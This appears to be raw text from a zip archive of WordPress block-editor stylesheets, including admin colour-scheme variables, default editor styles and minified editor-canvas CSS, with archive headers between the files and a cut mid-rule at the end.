.spacing-sizes-control__dropdown{ height:24px; } .spacing-sizes-control__custom-select-control,.spacing-sizes-control__custom-value-input{ flex:1; } .spacing-sizes-control__custom-toggle,.spacing-sizes-control__icon{ flex:0 0 auto; } .spacing-sizes-control__icon{ margin-left:-4px; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK! E  /dist/block-editor/default-editor-styles.min.cssnuȯbody{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:18px;line-height:1.5;--wp--style--block-gap:2em}p{line-height:1.8}.editor-post-title__block{font-size:2.5em;font-weight:800;margin-bottom:1em;margin-top:2em}PK!ܕEE+dist/block-editor/default-editor-styles.cssnuȯbody{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:18px; line-height:1.5; --wp--style--block-gap:2em; } p{ line-height:1.8; } .editor-post-title__block{ font-size:2.5em; font-weight:800; margin-bottom:1em; margin-top:2em; }PK!Ԅ vv%dist/block-editor/content-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.block-editor-block-icon{align-items:center;display:flex;height:24px;justify-content:center;width:24px}.block-editor-block-icon.has-colors svg{fill:currentColor}@media (forced-colors:active){.block-editor-block-icon.has-colors svg{fill:CanvasText}}.block-editor-block-icon svg{max-height:24px;max-width:24px;min-height:20px;min-width:20px}.block-editor-block-styles .block-editor-block-list__block{margin:0}@keyframes selection-overlay__fade-in-animation{0%{opacity:0}to{opacity:.4}}:root .block-editor-block-list__layout::selection,:root [data-has-multi-selection=true] .block-editor-block-list__layout::selection,_::-webkit-full-page-media,_:future{background-color:initial}.block-editor-block-list__layout{position:relative}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected) ::selection,.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected)::selection{background:#0000}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{background:var(--wp-admin-theme-color);bottom:0;content:"";left:0;opacity:.4;pointer-events:none;position:absolute;right:0;top:0;z-index:1}@media not (prefers-reduced-motion){.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{animation:selection-overlay__fade-in-animation .1s ease-out;animation-fill-mode:forwards}}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{outline:2px solid #0000}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected).is-highlighted:after{outline-color:#0000}.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus{outline:none}.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted:after,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected:after,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus:after{bottom:0;content:"";left:0;outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1));outline-style:solid;outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1));pointer-events:none;position:absolute;right:0;top:0;z-index:1}.block-editor-block-list__layout .block-editor-block-list__block.is-block-hidden{border:none!important;height:0;overflow:hidden;padding:0!important;visibility:hidden}.block-editor-block-list__layout.is-layout-flex:not(.is-vertical)>.is-block-hidden{align-self:stretch;height:auto;white-space:nowrap!important;width:0}.block-editor-block-list__layout [class^=components-]{-webkit-user-select:text;user-select:text}.block-editor-block-list__layout .block-editor-block-list__block{overflow-wrap:break-word;pointer-events:auto;position:relative}.block-editor-block-list__layout .block-editor-block-list__block.is-editing-disabled{pointer-events:none}.block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.has-child-selected,.block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.is-selected{z-index:20}.block-editor-block-list__layout .block-editor-block-list__block .reusable-block-edit-panel *{z-index:1}.block-editor-block-list__layout .block-editor-block-list__block .components-placeholder .components-with-notices-ui{margin:-10px 0 12px}.block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui{margin:0 0 12px;width:100%}.block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui .components-notice .components-notice__content{font-size:13px}.block-editor-block-list__layout .block-editor-block-list__block.has-warning{min-height:48px}.block-editor-block-list__layout .block-editor-block-list__block.has-warning>*{pointer-events:none;-webkit-user-select:none;user-select:none}.block-editor-block-list__layout .block-editor-block-list__block.has-warning .block-editor-warning{pointer-events:all}.block-editor-block-list__layout .block-editor-block-list__block.has-warning:after{background-color:#fff6;bottom:0;content:"";left:0;position:absolute;right:0;top:0}.block-editor-block-list__layout .block-editor-block-list__block.has-warning.is-multi-selected:after{background-color:initial}.block-editor-block-list__layout .block-editor-block-list__block.is-reusable.has-child-selected:after{box-shadow:0 0 0 1px var(--wp-admin-theme-color)}.block-editor-block-list__layout .block-editor-block-list__block[data-clear=true]{float:none}.block-editor-block-list__layout .block-editor-block-list__block:not([data-draggable=true]),.block-editor-block-list__layout .block-editor-block-list__block:not([draggable=true]){cursor:default}.block-editor-block-list__layout .block-editor-block-list__block[data-draggable=true],.block-editor-block-list__layout .block-editor-block-list__block[draggable=true]{cursor:grab}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected{cursor:default}.block-editor-block-list__layout .block-editor-block-list__block [contenteditable],.block-editor-block-list__layout .block-editor-block-list__block[contenteditable]{cursor:text}.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-hovered:not(.is-selected):after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline):not(.rich-text):not([contenteditable=true]).is-selected:after{bottom:0;content:"";left:0;outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1));outline-style:solid;outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1));pointer-events:none;position:absolute;right:0;top:0}.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{outline-color:var(--wp-block-synced-color)}@keyframes block-editor-is-editable__animation{0%{background-color:rgba(var(--wp-admin-theme-color--rgb),.1)}to{background-color:rgba(var(--wp-admin-theme-color--rgb),0)}}@keyframes block-editor-is-editable__animation_reduce-motion{0%{background-color:rgba(var(--wp-admin-theme-color--rgb),.1)}99%{background-color:rgba(var(--wp-admin-theme-color--rgb),.1)}to{background-color:rgba(var(--wp-admin-theme-color--rgb),0)}}.is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{animation-delay:.1s;animation-duration:.8s;animation-fill-mode:backwards;animation-name:block-editor-is-editable__animation;animation-timing-function:ease-out;bottom:0;content:"";left:0;pointer-events:none;position:absolute;right:0;top:0}@media (prefers-reduced-motion:reduce){.is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{animation-delay:0s;animation-name:block-editor-is-editable__animation_reduce-motion}}.is-focus-mode .block-editor-block-list__block:not(.has-child-selected){opacity:.2}@media not (prefers-reduced-motion){.is-focus-mode .block-editor-block-list__block:not(.has-child-selected){transition:opacity .1s linear}}.is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected) .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-multi-selected,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-selected{opacity:1}.wp-block.alignleft,.wp-block.alignright,.wp-block[data-align=left]>*,.wp-block[data-align=right]>*{z-index:21}.wp-site-blocks>[data-align=left]{float:right;margin-left:2em}.wp-site-blocks>[data-align=right]{float:left;margin-right:2em}.wp-site-blocks>[data-align=center]{justify-content:center;margin-left:auto;margin-right:auto}.block-editor-block-list .block-editor-inserter{cursor:move;cursor:grab;margin:8px}@keyframes block-editor-inserter__toggle__fade-in-animation{0%{opacity:0}to{opacity:1}}@media not (prefers-reduced-motion){.wp-block .block-list-appender .block-editor-inserter__toggle{animation:block-editor-inserter__toggle__fade-in-animation .1s ease;animation-fill-mode:forwards}}.block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender{display:none}.block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender .block-editor-inserter__toggle{opacity:0;transform:scale(0)}.block-editor-block-list__block .block-editor-block-list__block-html-textarea{border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;box-sizing:border-box;display:block;font-family:Menlo,Consolas,monaco,monospace;font-size:15px;line-height:1.5;margin:0;outline:none;overflow:hidden;padding:12px;resize:none;width:100%}@media not (prefers-reduced-motion){.block-editor-block-list__block .block-editor-block-list__block-html-textarea{transition:padding .2s linear}}.block-editor-block-list__block .block-editor-block-list__block-html-textarea:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-block-list__block .block-editor-warning{position:relative;z-index:5}.block-editor-block-list__block .block-editor-warning.block-editor-block-list__block-crash-warning{margin-bottom:auto}.block-editor-block-list__zoom-out-separator{background:#ddd;margin-left:-1px;margin-right:-1px}@media not (prefers-reduced-motion){.block-editor-block-list__zoom-out-separator{transition:background-color .3s ease}}.block-editor-block-list__zoom-out-separator{align-items:center;color:#000;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;justify-content:center;overflow:hidden}.is-zoomed-out .block-editor-block-list__zoom-out-separator{font-size:calc(13px/var(--wp-block-editor-iframe-zoom-out-scale))}.block-editor-block-list__zoom-out-separator.is-dragged-over{background:#ccc}.block-editor-block-list__layout.is-root-container.has-global-padding>.block-editor-block-list__zoom-out-separator,.has-global-padding>.block-editor-block-list__zoom-out-separator{margin:0 calc(var(--wp--style--root--padding-left)*-1 - 1px) 0 calc(var(--wp--style--root--padding-right)*-1 - 1px)!important;max-width:none}.is-dragging{cursor:grabbing}.is-vertical .block-list-appender{margin-left:auto;margin-right:12px;margin-top:12px;width:24px}.block-list-appender>.block-editor-inserter{display:block}.block-editor-block-list__block:not(.is-selected):not(.has-child-selected):not(.block-editor-block-list__layout) .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle{opacity:0;transform:scale(0)}.block-editor-block-list__block.has-block-overlay{cursor:default}.block-editor-block-list__block.has-block-overlay .block-editor-block-list__block{pointer-events:none}.block-editor-block-list__block.has-block-overlay .block-editor-block-list__block.has-block-overlay:before{left:0;right:0;width:auto}.block-editor-block-list__layout .is-dragging{opacity:.1}.block-editor-block-list__layout .is-dragging iframe{pointer-events:none}.block-editor-block-list__layout .is-dragging::selection{background:#0000!important}.block-editor-block-list__layout .is-dragging:after{content:none!important}.wp-block img:not([draggable]),.wp-block svg:not([draggable]){pointer-events:none}.block-editor-block-preview__content-iframe .block-list-appender{display:none}.block-editor-block-preview__live-content *{pointer-events:none}.block-editor-block-preview__live-content .block-list-appender{display:none}.block-editor-block-preview__live-content .components-button:disabled{opacity:1}.block-editor-block-preview__live-content .block-editor-block-list__block[data-empty=true],.block-editor-block-preview__live-content .components-placeholder{display:none}.block-editor-block-variation-picker__skip,.block-editor-block-variation-picker__variations,.wp-block-group-placeholder__variations{display:flex;flex-direction:row;flex-wrap:wrap;font-size:12px;gap:8px;justify-content:flex-start;list-style:none;margin:0;padding:0;width:100%}.block-editor-block-variation-picker__skip svg,.block-editor-block-variation-picker__variations svg,.wp-block-group-placeholder__variations svg{fill:#949494!important}.block-editor-block-variation-picker__skip .components-button,.block-editor-block-variation-picker__variations .components-button,.wp-block-group-placeholder__variations .components-button{padding:4px}.block-editor-block-variation-picker__skip .components-button:hover,.block-editor-block-variation-picker__variations .components-button:hover,.wp-block-group-placeholder__variations .components-button:hover{background:none!important}.block-editor-block-variation-picker__skip .components-button:hover svg,.block-editor-block-variation-picker__variations .components-button:hover svg,.wp-block-group-placeholder__variations .components-button:hover svg{fill:var(--wp-admin-theme-color)!important}.block-editor-block-variation-picker__skip>li,.block-editor-block-variation-picker__variations>li,.wp-block-group-placeholder__variations>li{align-items:center;display:flex;flex-direction:column;gap:4px;width:auto}.block-editor-button-block-appender{align-items:center;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e;display:flex;flex-direction:column;height:auto;justify-content:center;width:100%}.is-dark-theme .block-editor-button-block-appender{box-shadow:inset 0 0 0 1px #ffffffa6;color:#ffffffa6}.block-editor-button-block-appender:hover{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color);color:var(--wp-admin-theme-color)}.block-editor-button-block-appender:focus{box-shadow:inset 0 0 0 2px var(--wp-admin-theme-color)}.block-editor-button-block-appender:active{color:#000}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child{pointer-events:none}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after{border:1px dashed;bottom:0;content:"";left:0;pointer-events:none;position:absolute;right:0;top:0}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter{opacity:0}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within{opacity:1}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after{border:none}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter{visibility:visible}.block-editor-block-list__block:not(.is-selected)>.block-editor-block-list__block>.block-list-appender:only-child:after{border:none}.block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{background-color:var(--wp-admin-theme-color);box-shadow:inset 0 0 0 1px #ffffffa6;color:#ffffffa6}@media not (prefers-reduced-motion){.block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{transition:background-color .2s ease-in-out}}.block-editor-default-block-appender{clear:both;margin-left:auto;margin-right:auto;position:relative}.block-editor-default-block-appender[data-root-client-id=""] .block-editor-default-block-appender__content:hover{outline:1px solid #0000}.block-editor-default-block-appender .block-editor-default-block-appender__content{margin-block-end:0;margin-block-start:0;opacity:.62}.block-editor-default-block-appender .components-drop-zone__content-icon{display:none}.block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon{background:#1e1e1e;color:#fff;height:24px;min-width:24px;padding:0}.block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon:hover{background:var(--wp-admin-theme-color);color:#fff}.block-editor-default-block-appender .block-editor-inserter{left:0;line-height:0;position:absolute;top:0}.block-editor-default-block-appender .block-editor-inserter:disabled{display:none}.block-editor-block-list__block .block-list-appender{bottom:0;left:0;list-style:none;padding:0;position:absolute;z-index:2}.block-editor-block-list__block .block-list-appender.block-list-appender{line-height:0;margin:0}.block-editor-block-list__block .block-list-appender .block-editor-inserter:disabled{display:none}.block-editor-block-list__block .block-list-appender .block-editor-default-block-appender{height:24px}.block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle{background:#1e1e1e;box-shadow:none;color:#fff;display:none;flex-direction:row;height:24px;min-width:24px;padding:0!important;width:24px}.block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle:hover{background:var(--wp-admin-theme-color);color:#fff}.block-editor-block-list__block .block-list-appender .block-editor-default-block-appender__content{display:none}.block-editor-block-list__block .block-list-appender:only-child{align-self:center;left:auto;line-height:inherit;list-style:none;position:relative}.block-editor-block-list__block .block-list-appender:only-child .block-editor-default-block-appender__content{display:block}.block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle,.block-editor-block-list__block.is-selected>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected>.block-list-appender .block-list-appender__toggle{display:flex}.block-editor-default-block-appender__content{cursor:text}.block-editor-iframe__body{position:relative}.block-editor-iframe__html{transform-origin:top center}@media not (prefers-reduced-motion){.block-editor-iframe__html{transition:background-color .4s}}.block-editor-iframe__html.zoom-out-animation{bottom:0;left:0;overflow-y:var(--wp-block-editor-iframe-zoom-out-overflow-behavior,scroll);position:fixed;right:0;top:calc(var(--wp-block-editor-iframe-zoom-out-scroll-top, 0)*-1)}.block-editor-iframe__html.is-zoomed-out{background-color:var(--wp-editor-canvas-background);margin-bottom:calc(var(--wp-block-editor-iframe-zoom-out-content-height)*(1 - var(--wp-block-editor-iframe-zoom-out-scale, 1))*-1 + var(--wp-block-editor-iframe-zoom-out-frame-size, 0)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1)*-1 + -2px);padding-bottom:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1));padding-top:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1));scale:var(--wp-block-editor-iframe-zoom-out-scale,1);transform:translateX(calc(((var(--wp-block-editor-iframe-zoom-out-scale-container-width) - var(--wp-block-editor-iframe-zoom-out-container-width, 100vw))/2/var(--wp-block-editor-iframe-zoom-out-scale, 1))*-1))}.block-editor-iframe__html.is-zoomed-out body{min-height:calc((var(--wp-block-editor-iframe-zoom-out-inner-height) - 2*var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1))/var(--wp-block-editor-iframe-zoom-out-scale, 1))}.block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content){display:flex;flex:1;flex-direction:column;height:100%}.block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content)>main{flex:1}.block-editor-iframe__html.is-zoomed-out .wp-block[draggable]{cursor:grab}.block-editor-media-placeholder__cancel-button.is-link{display:block;margin:1em}.block-editor-media-placeholder.is-appender{min-height:0}.block-editor-media-placeholder.is-appender:hover{box-shadow:0 0 0 1px var(--wp-admin-theme-color);cursor:pointer}.block-editor-plain-text{border:none;box-shadow:none;color:inherit;font-family:inherit;font-size:inherit;line-height:inherit;margin:0;padding:0;width:100%}.rich-text [data-rich-text-placeholder]{pointer-events:none}.rich-text [data-rich-text-placeholder]:after{content:attr(data-rich-text-placeholder);opacity:.62}.rich-text:focus{outline:none}figcaption.block-editor-rich-text__editable [data-rich-text-placeholder]:before{opacity:.8}[data-rich-text-script]{display:inline}[data-rich-text-script]:before{background:#ff0;content:""}[data-rich-text-comment],[data-rich-text-format-boundary]{border-radius:2px}[data-rich-text-comment]{background-color:currentColor}[data-rich-text-comment] span{color:currentColor;filter:invert(100%);padding:0 2px}.rich-text [contenteditable=false]::selection{background-color:initial}.block-editor-warning{align-items:center;background-color:#fff;border:1px solid #1e1e1e;border-radius:2px;display:flex;flex-wrap:wrap;padding:1em}.block-editor-warning,.block-editor-warning .block-editor-warning__message{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif}.block-editor-warning .block-editor-warning__message{color:#1e1e1e;font-size:13px;line-height:1.4;margin:0}.block-editor-warning p.block-editor-warning__message.block-editor-warning__message{min-height:auto}.block-editor-warning .block-editor-warning__contents{align-items:baseline;display:flex;flex-direction:row;flex-wrap:wrap;gap:12px;justify-content:space-between;width:100%}.block-editor-warning .block-editor-warning__actions{align-items:center;display:flex;gap:8px}.components-popover.block-editor-warning__dropdown{z-index:99998}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media 